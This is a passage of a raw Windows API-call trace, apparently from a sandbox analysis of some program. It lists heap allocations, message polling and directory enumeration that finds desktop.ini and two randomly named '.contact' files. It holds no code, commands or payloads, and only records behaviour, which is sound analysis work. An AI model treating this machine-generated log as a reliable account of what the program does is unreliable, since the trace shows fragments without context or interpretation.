hHeap=0x8a0000) returned 1 [0157.093] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d70 [0157.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d80 [0157.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d80 | out: hHeap=0x8a0000) returned 1 [0157.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d70 | out: hHeap=0x8a0000) returned 1 [0157.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0157.094] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d70 [0157.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6d8 [0157.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d80 [0157.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6c0 [0157.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1da0 [0157.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x8e2a80 [0157.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6c0 | out: hHeap=0x8a0000) returned 1 [0157.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d90 [0157.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6c0 [0157.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba708 [0157.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1db0 [0157.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d90 | out: hHeap=0x8a0000) returned 1 [0157.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba708 | out: hHeap=0x8a0000) returned 1 [0157.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6c0 | out: hHeap=0x8a0000) returned 1 [0157.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d80 | out: hHeap=0x8a0000) returned 1 [0157.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d70 | out: hHeap=0x8a0000) returned 1 [0157.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2a80 | out: hHeap=0x8a0000) returned 1 [0157.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1da0 | out: hHeap=0x8a0000) returned 1 [0157.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6d8 | out: hHeap=0x8a0000) returned 1 [0157.095] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0157.095] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1da0 [0157.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1da0 | out: hHeap=0x8a0000) returned 1 [0157.095] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1da0 [0157.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0157.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6d8 [0157.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d70 [0157.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d70 | out: hHeap=0x8a0000) returned 1 [0157.095] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0157.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6c0 [0157.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0157.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d70 [0157.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6d8 | out: hHeap=0x8a0000) returned 1 [0157.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0157.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1da0 | out: hHeap=0x8a0000) returned 1 [0157.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0157.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d70 | out: hHeap=0x8a0000) returned 1 [0157.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6c0 | out: hHeap=0x8a0000) returned 1 [0157.095] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d70 [0157.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1da0 [0157.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1da0 | out: hHeap=0x8a0000) returned 1 [0157.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d70 | out: hHeap=0x8a0000) returned 1 [0157.096] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d70 [0157.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1da0 [0157.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1da0 | out: hHeap=0x8a0000) returned 1 [0157.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d70 | out: hHeap=0x8a0000) returned 1 [0157.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0157.096] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d70 [0157.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6c0 [0157.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1da0 [0157.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6d8 [0157.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d80 [0157.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8e2a80 [0157.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6d8 | out: hHeap=0x8a0000) returned 1 [0157.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1db0 [0157.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6d8 [0157.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba708 [0157.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d90 [0157.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba708 | out: hHeap=0x8a0000) returned 1 [0157.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d90 | out: hHeap=0x8a0000) returned 1 [0157.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6d8 | out: hHeap=0x8a0000) returned 1 [0157.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1da0 | out: hHeap=0x8a0000) returned 1 [0157.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d70 | out: hHeap=0x8a0000) returned 1 [0157.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4f0) returned 0x8e7bc8 [0157.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e7990 | out: hHeap=0x8a0000) returned 1 [0157.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2a80 | out: hHeap=0x8a0000) returned 1 [0157.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d80 | out: hHeap=0x8a0000) returned 1 [0157.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6c0 | out: hHeap=0x8a0000) returned 1 [0157.097] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0157.097] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d80 [0157.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d80 | out: hHeap=0x8a0000) returned 1 [0157.097] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d80 [0157.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0157.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6c0 [0157.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d70 [0157.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d70 | out: hHeap=0x8a0000) returned 1 [0157.097] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 1 [0157.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6d8 [0157.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0157.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d70 [0157.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6c0 | out: hHeap=0x8a0000) returned 1 [0157.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0157.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d80 | out: hHeap=0x8a0000) returned 1 [0157.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0157.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d70 | out: hHeap=0x8a0000) returned 1 [0157.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6d8 | out: hHeap=0x8a0000) returned 1 [0157.098] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d70 [0157.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d80 [0157.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d80 | out: hHeap=0x8a0000) returned 1 [0157.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d70 | out: hHeap=0x8a0000) returned 1 [0157.098] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d70 [0157.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d80 [0157.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d80 | out: hHeap=0x8a0000) returned 1 [0157.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d70 | out: hHeap=0x8a0000) returned 1 [0157.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0157.098] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d70 [0157.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6d8 [0157.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d80 [0157.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6c0 [0157.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1da0 [0157.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x8e2a80 [0157.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6c0 | out: hHeap=0x8a0000) returned 1 [0157.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d90 [0157.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6c0 [0157.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba708 [0157.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1db0 [0157.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d90 | out: hHeap=0x8a0000) returned 1 [0157.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba708 | out: hHeap=0x8a0000) returned 1 [0157.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6c0 | out: hHeap=0x8a0000) returned 1 [0157.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d80 | out: hHeap=0x8a0000) returned 1 [0157.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d70 | out: hHeap=0x8a0000) returned 1 [0157.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2a80 | out: hHeap=0x8a0000) returned 1 [0157.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1da0 | out: hHeap=0x8a0000) returned 1 [0157.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6d8 | out: hHeap=0x8a0000) returned 1 [0157.099] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0157.099] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1da0 [0157.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1da0 | out: hHeap=0x8a0000) returned 1 [0157.100] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1da0 [0157.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0157.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6d8 [0157.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d70 [0157.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d70 | out: hHeap=0x8a0000) returned 1 [0157.100] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 1 [0157.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6c0 [0157.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0157.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d70 [0157.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6d8 | out: hHeap=0x8a0000) returned 1 [0157.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0157.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1da0 | out: hHeap=0x8a0000) returned 1 [0157.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0157.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d70 | out: hHeap=0x8a0000) returned 1 [0157.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6c0 | out: hHeap=0x8a0000) returned 1 [0157.100] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d70 [0157.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1da0 [0157.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1da0 | out: hHeap=0x8a0000) returned 1 [0157.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d70 | out: hHeap=0x8a0000) returned 1 [0157.100] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d70 [0157.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1da0 [0157.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1da0 | out: hHeap=0x8a0000) returned 1 [0157.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d70 | out: hHeap=0x8a0000) returned 1 [0157.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0157.107] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d70 [0157.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6c0 [0157.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1da0 [0157.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6d8 [0157.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d80 [0157.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x8e2a80 [0157.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6d8 | out: hHeap=0x8a0000) returned 1 [0157.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1db0 [0157.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6d8 [0157.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba708 [0157.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d90 [0157.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba708 | out: hHeap=0x8a0000) returned 1 [0157.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d90 | out: hHeap=0x8a0000) returned 1 [0157.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6d8 | out: hHeap=0x8a0000) returned 1 [0157.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.108] HeapFree (in: 